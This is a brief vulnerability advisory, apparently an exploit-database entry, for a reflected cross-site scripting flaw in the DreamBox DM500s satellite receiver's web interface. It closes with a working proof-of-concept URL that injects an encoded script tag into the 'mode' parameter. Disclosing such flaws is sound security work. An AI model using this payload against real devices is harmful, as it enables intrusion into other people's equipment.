# DreamBox DM500s Reflected XSS
# Vendor: Dream Multimedia GmbH
# Product web page: http://www.dream-multimedia-tv.de
# Summary: The Dreambox DM500s is a Linux-powered DVB satellite, terrestrial and cable digital television receivers (set-top box).
# Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
# Vulnerability discovered by: Jay Turla (@shipcod3)
 
PoC:

http://192.168.1.10/body?mode=zap52b06%3Cscript%3Ealert%28%27shipcod3%27%29%3C%2fscript%3Eca184&zapmode=0&zapsubmode=4